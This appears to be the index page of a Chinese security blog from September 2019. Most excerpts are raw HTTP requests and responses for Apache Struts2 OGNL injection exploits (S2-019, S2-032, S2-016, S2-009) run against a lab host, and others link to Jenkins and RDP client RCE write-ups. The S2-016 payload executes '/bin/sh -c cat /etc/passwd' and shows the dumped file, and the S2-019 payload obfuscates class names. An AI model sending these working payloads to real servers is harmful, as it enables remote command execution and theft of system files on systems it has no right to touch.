September 12, 2019
Contents Struts2 S2-019 HTTP raw text <!–more–> 检测请求 POST /example/HelloWorld.action HTTP/1.1 Host:192.168.198.133:80 Accept-Language: zh_CN User-Agent: Auto Spider 1.0 Accept-Encoding: gzip, deflate Connection: close Content-Length: 492 Content-Type: application/x-www-form-urlencoded debug=command&expression=%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22struts2_security_%22),%23resp.getWriter().print(%22check%22),%23resp.getWriter().flush(),%23resp.getWriter().close()HTTP/1.1 200 Set-Cookie: JSESSIONID=339037A73494B91A16B5EC3974F956EC; Path=/; HttpOnly Content-Type: text/plain;charset=ISO-8859-1 Transfer-Encoding: chunked Date: Thu, 12 Sep 2019 07:42:15 GMT Connection: close 16 struts2_security_check 0 利用请求 POST /example/HelloWorld.action HTTP/1.1 Host:192.168.198.133:80 Accept-Language: […]
September 12, 2019
Struts2 S2-020 环境 <!–more–> 正文 https://hub.docker.com/r/tutum/tomcat 已经设置好 host manager 的 tomcat 环境 tomcat
September 12, 2019
某道全版本rce漏洞分析 <!–more–> https://xz.aliyun.com/t/6239
September 12, 2019
Contents Struts S2-032 HTTP raw text <!–more–> 正文 分析 [](http://wp.blkstone.me/wp-content/uploads/2019/09/s2_032_20190912.png "s2-032") 探测请求 POST / HTTP/1.1 Cookie: SessionId=96F3F15432E0660E0654B1CE240C4C36 User-Agent: Java/1.8.0_212 Host: 192.168.198.133:8888 Accept: text/html, image/gif, image/jpeg, *; q=.2, /; q=.2 Connection: keep-alive Content-type: application/x-www-form-urlencoded Content-Length: 209 method%3a%23_memberAccess%3d@ognl.OgnlContext+@DEFAULT_MEMBER_ACCESS%2c%23kxlzx%3d+@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2c%23kxlzx.println%2888888888-1%29%2c%23kxlzx.close HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 9 Date: Thu, 12 Sep 2019 04:07:32 GMT 88888887 OGNL method:#_memberAccess=@ognl.OgnlContext+@DEFAULT_MEMBER_ACCESS,#kxlzx=+@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#kxlzx.println(88888888-1),#kxlzx.close 利用请求 […]
September 11, 2019
Contents Struts S2-016 HTTP Raw TEXT <!–more–> 利用请求 POST /login.action HTTP/1.1 Cookie: SessionId=96F3F15432E0660E0654B1CE240C4C36 User-Agent: Java/1.8.0_212 Host: 192.168.198.133 Accept: text/html, image/gif, image/jpeg, *; q=.2, /; q=.2 Connection: keep-alive Content-type: application/x-www-form-urlencoded Content-Length: 651 redirect:%24%7B%23resp%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%28new+java.lang.ProcessBuilder(new+java.lang.String[]{‘/bin/sh’,’-c’,’cat+/etc/passwd’})).start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23dis%3Dnew+java.io.DataInputStream%28%23b%29%2C%23buf%3Dnew+byte%5B20000%5D%2C%23dis.read%28%23buf%29%2C%23msg%3Dnew+java.lang.String%28%23buf%29%2C%23dis.close%28%29%2C%23resp.getWriter%28%29.println%28%23msg.trim%28%29%29%2C%23resp.getWriter%28%29.flush%28%29%2C%23resp.getWriter%28%29.close%28%29%7D= HTTP/1.1 200 OK Server: nginx/1.12.2 Date: Wed, 11 Sep 2019 07:07:30 GMT Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: JSESSIONID=E251191A83A1CD97EE09BD19BC45A877-n1; Path=/ Content-Language: zh-CN 679 root:x:0:0:root:/root:/bin/bash […]
September 11, 2019
Struts S2-009 HTTP Raw TEXT <!–more–> 正文 POST /login.action HTTP/1.1 Cookie: SessionId=96F3F15432E0660E0654B1CE240C4C36 User-Agent: Java/1.8.0_212 Host: 192.168.198.133 Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Connection: keep-alive Content-type: application/x-www-form-urlencoded Content-Length: 444 class.classLoader.jarPath=%28%23context%5b%22xwork.MethodAccessor.denyMethodExecution%22%5d%3d+new+java.lang.Boolean%28false%29%2c+%23_memberAccess%5b%22allowStaticMethodAccess%22%5d%3dtrue%2c%23outstr%3d@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2c%23outstr.print%28%22webpath%22%29%2c%23outstr.println%28%22888888%22%29%2c%23outstr.close%28%29%29%28meh%29&z%5b%28class.classLoader.jarPath%29%28%27meh%27%29%5d= HTTP/1.1 200 OK Server: nginx/1.12.2 Date: Wed, 11 Sep 2019 04:00:24 GMT Content-Length: 15 Connection: keep-alive Set-Cookie: JSESSIONID=16985C7B820E22E13767E10B8AD57496-n1; Path=/ Content-Language: zh-CN webpath888888
September 11, 2019
Wireshark 常用的过滤器 | Wireshark frequently used filters
September 11, 2019
CVE-2019-0788 微软远程桌面客户端远程任意代码执行漏洞 <!–more–> 正文 mstsc 客户端连接 恶意 rdp 服务端时可能被服务端远程执行代码。 用途 内网钓鱼 蜜罐反打 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0788 https://www.tenable.com/blog/microsofts-september-2019-patch-tuesday-tenable-roundup
September 11, 2019
CVE-2019-1003000 Jenkins RCE PoC or simple pre-auth remote code execution on the Server <!–more–> 正文 https://medium.com/@valeriyshevchenko/jenkins-rce-poc-or-simple-pre-auth-remote-code-execution-on-the-server-d18b868a77cb
September 10, 2019
Golang TCP/IP Socket 接口编程的一些注意事项 <!–more–> 正文 防止产生一些持续等待的挂起行为。 后续补充